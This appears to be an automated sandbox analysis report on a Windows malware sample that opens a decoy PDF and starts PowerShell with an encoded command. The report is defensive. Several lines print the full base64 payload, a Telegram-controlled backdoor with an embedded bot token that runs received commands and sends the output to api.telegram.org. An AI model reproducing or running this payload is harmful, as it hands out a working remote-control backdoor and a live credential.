Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABUAG8AawBlAG4AIAA9ACAAIgA3ADUANQA0ADMAMAA3ADYANgA5ADoAQQBBAEUAXwBsAG4AUQBUAFkAUwBYAHYAdQBzAGEASwBsAGsAcABOAHIAdgAyAEQAdgBZAHUAQwA3AEgAaABJADAAcwAwACIADQAKACQAVQBSAEwAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AYQBwAGkALgB0AGUAbABlAGcAcgBhAG0ALgBvAHIAZwAvAGIAbwB0AHsAMAB9ACIAIAAtAGYAIAAkAFQAbwBrAGUAbgANAAoAJABsAGEAcwB0AEkARAAgAD0AIAAxADIAMwANAAoAJABzAGwAZQBlAHAAVABpAG0AZQAgAD0AIAAyAA0ACgAkAGkAZABlAG4AdABpAGYAaQBlAHIAIAA9ACAALQBqAG8AaQBuACAAKAAoADQAOAAuAC4ANQA3ACkAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAANQAgAHwAIAAlACAAewBbAGMAaABhAHIAXQAkAF8AfQApAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAASQBuAHYAbwBrAGUALQBCAG8AdABDAG0AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgACQAYwBvAG0AbQBhAG4AZAANAAoAIAAgACAAIAApAA0ACgAgACAAIAAgAHQAcgB5ACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAcgBlAHMAdQBsAHQAIAA9ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACgAJABjAG8AbQBtAGEAbgBkACkADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABjAGEAdABjAGgAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAByAGUAcwB1AGwAdAAgAD0AIAAkAEUAcgByAG8AcgBbADAAXQAuAEUAeABjAGUAcAB0AGkAbwBuAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAJAByAGUAcwAgAD0AIAAiAFsAJABpAGQAZQBuAHQAaQBmAGkAZQByAF0AJQAwAEQAJQAwAEEAIgANAAoAIAAgACAAIAAkAHIAZQBzAHUAbAB0ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAJAByAGUAcwAgACsAPQAgAFsAcwB0AHIAaQBuAGcAXQAkAF8AIAArACAAIgAlADAARAAlADAAQQAiAH0ADQAKAA0ACgAgACAAIAAgAGkAZgAoACQAcgBlAHMAIAAtAGUAcQAgACIAIgApAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAYQBzAHQASQBEACAAPQAgACQAdQBwAGQAYQB0AGUAaQBkAA0ACgAgACAAIAAgACAAIAAgACAAYwBvAG4AdABpAG4AdQBlAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACgAJAByAGUAcwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAA0ADAAOQA1ACkAewANAAoAIAAgACAAIAAgACAAIAAgAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHIAZQBzAC4ATABlAG4AZwB0AGgAIAAvACAANAAwADkANQA7ACAAJABpACsAKwApACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAGUAZwBpAG4AIAA9ACAAJABpACAAKgAgADQAMAA5ADUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQBuAGQAIAA9ACAAJABiAGUAZwBpAG4AIAArACAANAAwADkANAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABlAG4AZAAgAC0AZwB0ACAAJAByAGUAcwAuAEwAZQBuAGcAdABoACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAbgBkACAAPQAgACQAcgBlAHMALgBMAGUAbgBnAHQAaAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAGEAdABhACAAPQAgACIAYwBoAGEAdABfAGkAZAA9ACQAZgByAG8AbQAmAHQAZQB4AHQAPQAiACAAKwAgACQAcgBlAHMAWwAkAGIAZQBnAGkAbgAuAC4AJABlAG4AZABdAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQAZABhAHQAYQAiAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABVAFIASQAgAD4AIAAkAG4AdQBsAGwADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAZABhAHQAYQAgAD0AIAAiAGMAaABhAHQAXwBpAGQAPQAkAGYAcgBvAG0AJgB0AGUAeAB0AD0AJAByAGUAcwAiACAADQAKACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABUAG8AawBlAG4AIAA9ACAAIgA3ADUANQA0ADMAMAA3ADYANgA5ADoAQQBBAEUAXwBsAG4AUQBUAFkAUwBYAHYAdQBzAGEASwBsAGsAcABOAHIAdgAyAEQAdgBZAHUAQwA3AEgAaABJADAAcwAwACIADQAKACQAVQBSAEwAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AYQBwAGkALgB0AGUAbABlAGcAcgBhAG0ALgBvAHIAZwAvAGIAbwB0AHsAMAB9ACIAIAAtAGYAIAAkAFQAbwBrAGUAbgANAAoAJABsAGEAcwB0AEkARAAgAD0AIAAxADIAMwANAAoAJABzAGwAZQBlAHAAVABpAG0AZQAgAD0AIAAyAA0ACgAkAGkAZABlAG4AdABpAGYAaQBlAHIAIAA9ACAALQBqAG8AaQBuACAAKAAoADQAOAAuAC4ANQA3ACkAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAANQAgAHwAIAAlACAAewBbAGMAaABhAHIAXQAkAF8AfQApAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAASQBuAHYAbwBrAGUALQBCAG8AdABDAG0AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgACQAYwBvAG0AbQBhAG4AZAANAAoAIAAgACAAIAApAA0ACgAgACAAIAAgAHQAcgB5ACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAcgBlAHMAdQBsAHQAIAA9ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACgAJABjAG8AbQBtAGEAbgBkACkADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABjAGEAdABjAGgAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAByAGUAcwB1AGwAdAAgAD0AIAAkAEUAcgByAG8AcgBbADAAXQAuAEUAeABjAGUAcAB0AGkAbwBuAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAJAByAGUAcwAgAD0AIAAiAFsAJABpAGQAZQBuAHQAaQBmAGkAZQByAF0AJQAwAEQAJQAwAEEAIgANAAoAIAAgACAAIAAkAHIAZQBzAHUAbAB0ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAJAByAGUAcwAgACsAPQAgAFsAcwB0AHIAaQBuAGcAXQAkAF8AIAArACAAIgAlADAARAAlADAAQQAiAH0ADQAKAA0ACgAgACAAIAAgAGkAZgAoACQAcgBlAHMAIAAtAGUAcQAgACIAIgApAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAYQBzAHQASQBEACAAPQAgACQAdQBwAGQAYQB0AGUAaQBkAA0ACgAgACAAIAAgACAAIAAgACAAYwBvAG4AdABpAG4AdQBlAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACgAJAByAGUAcwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAA0ADAAOQA1ACkAewANAAoAIAAgACAAIAAgACAAIAAgAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHIAZQBzAC4ATABlAG4AZwB0AGgAIAAvACAANAAwADkANQA7ACAAJABpACsAKwApACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAGUAZwBpAG4AIAA9ACAAJABpACAAKgAgADQAMAA5ADUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQBuAGQAIAA9ACAAJABiAGUAZwBpAG4AIAArACAANAAwADkANAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABlAG4AZAAgAC0AZwB0ACAAJAByAGUAcwAuAEwAZQBuAGcAdABoACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAbgBkACAAPQAgACQAcgBlAHMALgBMAGUAbgBnAHQAaAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAGEAdABhACAAPQAgACIAYwBoAGEAdABfAGkAZAA9ACQAZgByAG8AbQAmAHQAZQB4AHQAPQAiACAAKwAgACQAcgBlAHMAWwAkAGIAZQBnAGkAbgAuAC4AJABlAG4AZABdAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQAZABhAHQAYQAiAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABVAFIASQAgAD4AIAAkAG4AdQBsAGwADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAZABhAHQAYQAgAD0AIAAiAGMAaABhAHQAXwBpAGQAPQAkAGYAcgBvAG0AJgB0AGUAeAB0AD0AJAByAGUAcwAiACAADQAKACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQJump to behavior

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: powershell.exe PID: 3084, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF767EF28C00_2_00007FF767EF28C0
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF767F0FEE80_2_00007FF767F0FEE8
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF767F018940_2_00007FF767F01894
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF767EFF8240_2_00007FF767EFF824
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF767F0000C0_2_00007FF767F0000C
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF767F027640_2_00007FF767F02764
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF767F0AAE00_2_00007FF767F0AAE0
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF767F083400_2_00007FF767F08340
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF767F0DBA80_2_00007FF767F0DBA8
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF767F09C780_2_00007FF767F09C78
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF767F0C6980_2_00007FF767F0C698
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF767F0F84C0_2_00007FF767F0F84C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8AFB954_2_00007FFD9B8AFB95
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8AFB0C4_2_00007FFD9B8AFB0C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8A72084_2_00007FFD9B8A7208
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8AE7584_2_00007FFD9B8AE758
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B9738494_2_00007FFD9B973849
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B97418F4_2_00007FFD9B97418F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B973B9E4_2_00007FFD9B973B9E
Source: C:\Users\user\Desktop\12.exeProcess created: Commandline size = 9483
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 9439
Source: C:\Users\user\Desktop\12.exeProcess created: Commandline size = 9483Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 9439Jump to behavior
Source: Process Memory Space: powershell.exe PID: 3084, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal92.bank.evad.winEXE@22/48@0/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Users\user\Desktop\12.exeFile created: C:\Users\user\AppData\Local\Temp\file.pdfJump to behavior
Source: 12.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\12.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 12.exeVirustotal: Detection: 16%
Source: 12.exeReversingLabs: Detection: 15%
Source: unknownProcess created: C:\Users\user\Desktop\12.exe "C:\Users\user\Desktop\12.exe"
Source: C:\Users\user\Desktop\12.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\/file.pdf'; powershell.exe -e 'JABUAG8AawBlAG4AIAA9ACAAIgA3ADUANQA0ADMAMAA3ADYANgA5ADoAQQBBAEUAXwBsAG4AUQBUAFkAUwBYAHYAdQBzAGEASwBsAGsAcABOAHIAdgAyAEQAdgBZAHUAQwA3AEgAaABJADAAcwAwACIADQAKACQAVQBSAEwAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AYQBwAGkALgB0AGUAbABlAGcAcgBhAG0ALgBvAHIAZwAvAGIAbwB0AHsAMAB9ACIAIAAtAGYAIAAkAFQAbwBrAGUAbgANAAoAJABsAGEAcwB0AEkARAAgAD0AIAAxADIAMwANAAoAJABzAGwAZQBlAHAAVABpAG0AZQAgAD0AIAAyAA0ACgAkAGkAZABlAG4AdABpAGYAaQBlAHIAIAA9ACAALQBqAG8AaQBuACAAKAAoADQAOAAuAC4ANQA3ACkAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAANQAgAHwAIAAlACAAewBbAGMAaABhAHIAXQAkAF8AfQApAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAASQBuAHYAbwBrAGUALQBCAG8AdABDAG0AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgACQAYwBvAG0AbQBhAG4AZAANAAoAIAAgACAAIAApAA0ACgAgACAAIAAgAHQAcgB5ACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAcgBlAHMAdQBsAHQAIAA9ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACgAJABjAG8AbQBtAGEAbgBkACkADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABjAGEAdABjAGgAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAByAGUAcwB1AGwAdAAgAD0AIAAkAEUAcgByAG8AcgBbADAAXQAuAEUAeABjAGUAcAB0AGkAbwBuAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAJAByAGUAcwAgAD0AIAAiAFsAJABpAGQAZQBuAHQAaQBmAGkAZQByAF0AJQAwAEQAJQAwAEEAIgANAAoAIAAgACAAIAAkAHIAZQBzAHUAbAB0ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAJAByAGUAcwAgACsAPQAgAFsAcwB0AHIAaQBuAGcAXQAkAF8AIAArACAAIgAlADAARAAlADAAQQAiAH0ADQAKAA0ACgAgACAAIAAgAGkAZgAoACQAcgBlAHMAIAAtAGUAcQAgACIAIgApAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAYQBzAHQASQBEACAAPQAgACQAdQBwAGQAYQB0AGUAaQBkAA0ACgAgACAAIAAgACAAIAAgACAAYwBvAG4AdABpAG4AdQBlAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACgAJAByAGUAcwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAA0ADAAOQA1ACkAewANAAoAIAAgACAAIAAgACAAIAAgAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHIAZQBzAC4ATABlAG4AZwB0AGgAIAAvACAANAAwADkANQA7ACAAJABpACsAKwApACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAGUAZwBpAG4AIAA9ACAAJABpACAAKgAgADQAMAA5ADUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQBuAGQAIAA9ACAAJABiAGUAZwBpAG4AIAArACAANAAwADkANAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABlAG4AZAAgAC0AZwB0ACAAJAByAGUAcwAuAEwAZQBuAGcAdABoACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAbgBkACAAPQAgACQAcgBlAHMALgBMAGUAbgBnAHQAaAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAGEAdABhACAAPQAgACIAYwBoAGEAdABfAGkAZAA9ACQAZgByAG8AbQAmAHQAZQB4AHQAPQAiACAAKwAgACQAcgBlAHMAWwAkAGIAZQBnAGkAbgAuAC4AJABlAG4AZABdAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQAZABhAHQAYQAiAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABVAFIASQAgAD4AIAAkAG4AdQBsAGwADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAZABhAHQAYQAgAD0AIAAiAGMAaABhAHQAXwBpAGQAPQAkAGYAcgBvAG0AJgB0AGUAeAB0AD0AJAByAGUAcwAiACAADQAKACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\file.pdf"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABUAG8AawBlAG4AIAA9ACAAIgA3ADUANQA0ADMAMAA3ADYANgA5ADoAQQBBAEUAXwBsAG4AUQBUAFkAUwBYAHYAdQBzAGEASwBsAGsAcABOAHIAdgAyAEQAdgBZAHUAQwA3AEgAaABJADAAcwAwACIADQAKACQAVQBSAEwAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AYQBwAGkALgB0AGUAbABlAGcAcgBhAG0ALgBvAHIAZwAvAGIAbwB0AHsAMAB9ACIAIAAtAGYAIAAkAFQAbwBrAGUAbgANAAoAJABsAGEAcwB0AEkARAAgAD0AIAAxADIAMwANAAoAJABzAGwAZQBlAHAAVABpAG0AZQAgAD0AIAAyAA0ACgAkAGkAZABlAG4AdABpAGYAaQBlAHIAIAA9ACAALQBqAG8AaQBuACAAKAAoADQAOAAuAC4ANQA3ACkAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAANQAgAHwAIAAlACAAewBbAGMAaABhAHIAXQAkAF8AfQApAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAASQBuAHYAbwBrAGUALQBCAG8AdABDAG0AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgACQAYwBvAG0AbQBhAG4AZAANAAoAIAAgACAAIAApAA0ACgAgACAAIAAgAHQAcgB5ACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAcgBlAHMAdQBsAHQAIAA9ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACgAJABjAG8AbQBtAGEAbgBkACkADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABjAGEAdABjAGgAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAByAGUAcwB1AGwAdAAgAD0AIAAkAEUAcgByAG8AcgBbADAAXQAuAEUAeABjAGUAcAB0AGkAbwBuAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAJAByAGUAcwAgAD0AIAAiAFsAJABpAGQAZQBuAHQAaQBmAGkAZQByAF0AJQAwAEQAJQAwAEEAIgANAAoAIAAgACAAIAAkAHIAZQBzAHUAbAB0ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAJAByAGUAcwAgACsAPQAgAFsAcwB0AHIAaQBuAGcAXQAkAF8AIAArACAAIgAlADAARAAlADAAQQAiAH0ADQAKAA0ACgAgACAAIAAgAGkAZgAoACQAcgBlAHMAIAAtAGUAcQAgACIAIgApAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAYQBzAHQASQBEACAAPQAgACQAdQBwAGQAYQB0AGUAaQBkAA0ACgAgACAAIAAgACAAIAAgACAAYwBvAG4AdABpAG4AdQBlAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACgAJAByAGUAcwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAA0ADAAOQA1ACkAewANAAoAIAAgACAAIAAgACAAIAAgAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHIAZQBzAC4ATABlAG4AZwB0AGgAIAAvACAANAAwADkANQA7ACAAJABpACsAKwApACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAGUAZwBpAG4AIAA9ACAAJABpACAAKgAgADQAMAA5ADUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQBuAGQAIAA9ACAAJABiAGUAZwBpAG4AIAArACAANAAwADkANAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABlAG4AZAAgAC0AZwB0ACAAJAByAGUAcwAuAEwAZQBuAGcAdABoACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAbgBkACAAPQAgACQAcgBlAHMALgBMAGUAbgBnAHQAaAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAGEAdABhACAAPQAgACIAYwBoAGEAdABfAGkAZAA9ACQAZgByAG8AbQAmAHQAZQB4AHQAPQAiACAAKwAgACQAcgBlAHMAWwAkAGIAZQBnAGkAbgAuAC4AJABlAG4AZABdAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQAZABhAHQAYQAiAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABVAFIASQAgAD4AIAAkAG4AdQBsAGwADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAZABhAHQAYQAgAD0AIAAiAGMAaABhAHQAXwBpAGQAPQAkAGYAcgBvAG0AJgB0AGUAeAB0AD0AJAByAGUAcwAiACAADQAKACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQ
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1636,i,11664794565421518283,13165857320494331314,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Users\user\Desktop\12.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\/file.pdf'; powershell.exe -e 'JABUAG8AawBlAG4AIAA9ACAAIgA3ADUANQA0ADMAMAA3ADYANgA5ADoAQQBBAEUAXwBsAG4AUQBUAFkAUwBYAHYAdQBzAGEASwBsAGsAcABOAHIAdgAyAEQAdgBZAHUAQwA3AEgAaABJADAAcwAwACIADQAKACQAVQBSAEwAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AYQBwAGkALgB0AGUAbABlAGcAcgBhAG0ALgBvAHIAZwAvAGIAbwB0AHsAMAB9ACIAIAAtAGYAIAAkAFQAbwBrAGUAbgANAAoAJABsAGEAcwB0AEkARAAgAD0AIAAxADIAMwANAAoAJABzAGwAZQBlAHAAVABpAG0AZQAgAD0AIAAyAA0ACgAkAGkAZABlAG4AdABpAGYAaQBlAHIAIAA9ACAALQBqAG8AaQBuACAAKAAoADQAOAAuAC4ANQA3ACkAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAANQAgAHwAIAAlACAAewBbAGMAaABhAHIAXQAkAF8AfQApAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAASQBuAHYAbwBrAGUALQBCAG8AdABDAG0AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgACQAYwBvAG0AbQBhAG4AZAANAAoAIAAgACAAIAApAA0ACgAgACAAIAAgAHQAcgB5ACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAcgBlAHMAdQBsAHQAIAA9ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACgAJABjAG8AbQBtAGEAbgBkACkADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABjAGEAdABjAGgAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAByAGUAcwB1AGwAdAAgAD0AIAAkAEUAcgByAG8AcgBbADAAXQAuAEUAeABjAGUAcAB0AGkAbwBuAA0A